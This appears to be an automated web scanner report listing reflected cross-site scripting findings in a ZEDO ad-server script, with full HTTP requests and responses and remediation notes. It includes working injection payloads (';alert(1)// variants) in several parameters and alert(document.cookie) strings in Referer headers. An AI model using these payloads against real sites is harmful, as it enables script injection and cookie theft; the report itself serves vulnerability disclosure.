if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=126;var zzPat=',5b870";alert(1)//b6e0807d8e';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=,5b870";alert(1)//b6e0807d8e;z="+Math.random();}
The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f791'%3balert(1)//4a5a3c4bd88 was submitted in the $ parameter. This input was echoed as 4f791';alert(1)//4a5a3c4bd88 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/c5/jsc/fm.js?c=101&a=0&f=&n=1220&r=13&d=9&q=&$=4f791'%3balert(1)//4a5a3c4bd88&s=69&l=http%3A//hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/&z=0.11480318708345294 HTTP/1.1 Host: c7.zedo.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365
Response (redirected)
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1220:4f791';alert(1)//4a5a3c4bd88;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "86257539-809a-4988a5ada3000" Vary: Accept-Encoding X-Varnish: 1882667040 1882666656 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=33 Expires: Fri, 28 Jan 2011 16:41:50 GMT Date: Fri, 28 Jan 2011 16:41:17 GMT Connection: close Content-Length: 1931
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=69;var zzPat=',4f791';alert(1)//4a5a3c4bd88';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=,4f791';alert(1)//4a5a3c4bd88;z="+Math.random();}
The value of the c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18ba8'-alert(1)-'e6b713d7cf8 was submitted in the c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/c5/jsc/fm.js?c=18ba8'-alert(1)-'e6b713d7cf8 HTTP/1.1 Host: c7.zedo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFcat=1220,167,14:1220,101,9; ZFFAbh=749B826,20|1483_758#365; FFad=0:0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; __qca=P0-2130372027-1295906131971;
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Length: 985 Content-Type: application/x-javascript Set-Cookie: FFad=0:0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=0,0,0:1220,167,14:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "419234-82a5-4988a5a7ea280" X-Varnish: 1882666994 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=559 Expires: Fri, 28 Jan 2011 16:54:01 GMT Date: Fri, 28 Jan 2011 16:44:42 GMT Connection: close
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=0;var zzPat='';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=;z="+Math.random();}
The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f8db9'%3balert(1)//29186ca98e5 was submitted in the l parameter. This input was echoed as f8db9';alert(1)//29186ca98e5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71994'%3balert(1)//d11fda3e366 was submitted in the l parameter. This input was echoed as 71994';alert(1)//d11fda3e366 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/c5/jsc/fm.js?c=101&a=0&f=&n=1220&r=13&d=9&q=&$=&s=69&l=http%3A//hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/71994'%3balert(1)//d11fda3e366&z=0.11480318708345294 HTTP/1.1 Host: c7.zedo.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365
Response (redirected)
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFad=0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "86257539-809a-4988a5ada3000" Vary: Accept-Encoding X-Varnish: 1882667040 1882666656 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=31 Expires: Fri, 28 Jan 2011 16:41:50 GMT Date: Fri, 28 Jan 2011 16:41:19 GMT Connection: close Content-Length: 1900
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=69;var zzPat='';var zzCu ...[SNIP]... DYAAHrQ5V4AAACH~010411;p=6;f=990638;h=922865;k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/71994';alert(1)//d11fda3e366"> ...[SNIP]...
4.238. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://c7.zedo.com
Path:
/bar/v16-401/c5/jsc/fm.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8cdf'-alert(1)-'3d2ba540778 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/c5/jsc/fm.js?a8cdf'-alert(1)-'3d2ba540778=1 HTTP/1.1 Host: c7.zedo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFcat=1220,167,14:1220,101,9; ZFFAbh=749B826,20|1483_758#365; FFad=0:0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; __qca=P0-2130372027-1295906131971;
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Length: 985 Content-Type: application/x-javascript Set-Cookie: FFad=0:0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=0,0,0:1220,167,14:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "419234-82a5-4988a5a7ea280" X-Varnish: 1882666994 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=555 Expires: Fri, 28 Jan 2011 16:54:00 GMT Date: Fri, 28 Jan 2011 16:44:45 GMT Connection: close
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=0;var zzPat='';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=;z="+Math.random();}
The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b36ef'%3balert(1)//bf55c3b27b0 was submitted in the q parameter. This input was echoed as b36ef';alert(1)//bf55c3b27b0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/c5/jsc/fm.js?c=101&a=0&f=&n=1220&r=13&d=9&q=b36ef'%3balert(1)//bf55c3b27b0&$=&s=69&l=http%3A//hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/&z=0.11480318708345294 HTTP/1.1 Host: c7.zedo.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365
Response (redirected)
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFad=0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "86257539-809a-4988a5ada3000" Vary: Accept-Encoding X-Varnish: 1882667040 1882666656 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=36 Expires: Fri, 28 Jan 2011 16:41:50 GMT Date: Fri, 28 Jan 2011 16:41:14 GMT Connection: close Content-Length: 1928
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=69;var zzPat='b36ef';alert(1)//bf55c3b27b0';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=b36ef';alert(1)//bf55c3b27b0;z="+Math.random();}
The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5468"%3balert(1)//ca9a118c5a2 was submitted in the q parameter. This input was echoed as a5468";alert(1)//ca9a118c5a2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/c5/jsc/fm.js?c=101&a=0&f=&n=1220&r=13&d=9&q=a5468"%3balert(1)//ca9a118c5a2&$=&s=69&l=http%3A//hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/&z=0.11480318708345294 HTTP/1.1 Host: c7.zedo.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365
Response (redirected)
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFad=0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "86257539-809a-4988a5ada3000" Vary: Accept-Encoding X-Varnish: 1882667040 1882666656 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=37 Expires: Fri, 28 Jan 2011 16:41:50 GMT Date: Fri, 28 Jan 2011 16:41:13 GMT Connection: close Content-Length: 1928
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=69;var zzPat='a5468";alert(1)//ca9a118c5a2';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=a5468";alert(1)//ca9a118c5a2;z="+Math.random();}
The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0c81'%3balert(1)//d0aa9fd4ab0 was submitted in the q parameter. This input was echoed as b0c81';alert(1)//d0aa9fd4ab0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFad=0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1220,167,14:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "419234-82a5-4988a5a7ea280" Vary: Accept-Encoding X-Varnish: 1882666994 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=44 Expires: Fri, 28 Jan 2011 16:41:50 GMT Date: Fri, 28 Jan 2011 16:41:06 GMT Connection: close Content-Length: 1931
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=126;var zzPat='b0c81';alert(1)//d0aa9fd4ab0';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=b0c81';alert(1)//d0aa9fd4ab0;z="+Math.random();}
The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b513f"%3balert(1)//a126b16dd12 was submitted in the q parameter. This input was echoed as b513f";alert(1)//a126b16dd12 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFad=0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1220,167,14:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "419234-82a5-4988a5a7ea280" Vary: Accept-Encoding X-Varnish: 1882666994 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=44 Expires: Fri, 28 Jan 2011 16:41:50 GMT Date: Fri, 28 Jan 2011 16:41:06 GMT Connection: close Content-Length: 1931
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=126;var zzPat='b513f";alert(1)//a126b16dd12';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=b513f";alert(1)//a126b16dd12;z="+Math.random();}
The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 976a8'%3balert(1)//8b6cb345271 was submitted in the $ parameter. This input was echoed as 976a8';alert(1)//8b6cb345271 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1220:976a8';alert(1)//8b6cb345271;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "86257539-809a-4988a5ada3000" Vary: Accept-Encoding X-Varnish: 1882667040 1882666656 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=41 Expires: Fri, 28 Jan 2011 16:41:50 GMT Date: Fri, 28 Jan 2011 16:41:09 GMT Connection: close Content-Length: 1931
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=69;var zzPat=',976a8';alert(1)//8b6cb345271';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=,976a8';alert(1)//8b6cb345271;z="+Math.random();}
The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41e06"%3balert(1)//3fda4fef972 was submitted in the $ parameter. This input was echoed as 41e06";alert(1)//3fda4fef972 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1220:41e06";alert(1)//3fda4fef972;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "86257539-809a-4988a5ada3000" Vary: Accept-Encoding X-Varnish: 1882667040 1882666656 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=42 Expires: Fri, 28 Jan 2011 16:41:50 GMT Date: Fri, 28 Jan 2011 16:41:08 GMT Connection: close Content-Length: 1931
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=69;var zzPat=',41e06";alert(1)//3fda4fef972';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=,41e06";alert(1)//3fda4fef972;z="+Math.random();}
The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 132e9'%3balert(1)//cb504a93756 was submitted in the l parameter. This input was echoed as 132e9';alert(1)//cb504a93756 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFad=0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "86257539-809a-4988a5ada3000" Vary: Accept-Encoding X-Varnish: 1882667040 1882666656 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=37 Expires: Fri, 28 Jan 2011 16:41:50 GMT Date: Fri, 28 Jan 2011 16:41:13 GMT Connection: close Content-Length: 1900
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
